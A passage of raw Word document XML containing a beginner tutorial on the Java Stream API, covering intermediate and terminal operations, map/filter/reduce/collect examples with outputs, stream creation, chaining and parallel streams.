          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Streams support parallel operations, which allows you to process data in parallel and take advantage of multi-core processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E366C9B" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Stream API Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F1570B"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The Stream API supports two types of operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA507A8" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>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Intermediate Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: These operations transform a stream into another stream, but they are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (they do not execute until a terminal operation is invoked). Examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F237685" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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map()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86B8E3" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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filter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FBDDF" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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distinct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3F2F1" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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sorted()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C0D13" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>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Terminal Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: These operations produce a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side effect</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like a collection, count, sum, etc.). They trigger the processing of the stream. Examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E5FC1" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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collect()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C3E63" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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forEach()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F923C8D" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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reduce()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829A5DE" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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count()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CD1BC8" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1064"/>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anyMatch() / allMatch() / noneMatch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF6ADF" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Common Stream Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA3D516" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>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map()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Transforms each element in the stream using a provided function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B329DC2"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDB038D"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List&lt;Integer&gt; squaredNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40241D87"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map(n -&gt; n * n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D8DB3"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collect(Collectors.toList());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581D4B6" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="36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Output: [1, 4, 9, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CA04EF" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>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filter()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Filters elements in the stream based on a predicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C3538"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58026A80"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List&lt;Integer&gt; evenNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCA370"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filter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6F1F4"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collect(Collectors.toList());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CF7A0"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Output: [2, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84BB19" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>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reduce()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces the stream into a single value using an accumulator function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A7F3A"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFC969"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int sum = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E8602"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reduce(0, (a, b) -&gt; a + b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87AB6E"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Output: 10 (sum of numbers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8775A" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>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collect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collects the elements of the stream into a collection (like a list or set).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9769BE"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0AB1C"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Set&lt;Integer&gt; uniqueNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70715292"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collect(Collectors.toSet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46799F8D"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Output: [1, 2, 3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EACF72" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>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forEach()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Applies a consumer function to each element in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45251F7B"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C358E12"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numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9820F4"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forEach(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0035175F"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Output: 1 2 3 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE4C31" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. How to Use the Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D9B83" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>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Creating Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453E323" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1066"/>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lastRenderedPageBreak/>
        <w:t>From Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can convert any Collection (e.g., List, Set) to a stream using the stream() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D8D02" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1066"/>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From Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Arrays can also be converted into streams using Arrays.stream().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215750A8" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1066"/>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From Stream.of()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can create a stream directly from values using Stream.of().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE0916"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F527A"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBC0915"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Stream&lt;Integer&gt; stream = numbers.stream();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB540B9" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>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Chaining Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Streams allow you to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple operations together to transform data in one flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380C7BB"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7B388F"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List&lt;Integer&gt; result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3835A7CE"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filter(n -&gt; n % 2 != 0)  // Filter odd numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D736C37"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map(n -&gt; n * 2)           // Double them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B66C7"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collect(Collectors.toList());  // Collect into a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6072B03D" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:ind w:left="720"/>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Output: [2, 6, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE00D19" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Parallel Streams for Better Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70633200"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By calling parallelStream() on a collection, you can process elements in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using multiple threads. This is especially useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large datasets</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>expensive computations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28821380"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2132E5C0"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numbers.parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4BED5"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map(n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339C12E"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forEach(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4C658" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Advantages of the Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A067F" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>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Improved Readability</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The Stream API allows you to write more declarative code, meaning the focus is on </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be done, not </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it should be done. This leads to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simplified and more readable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247F89A" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>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Chaining Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
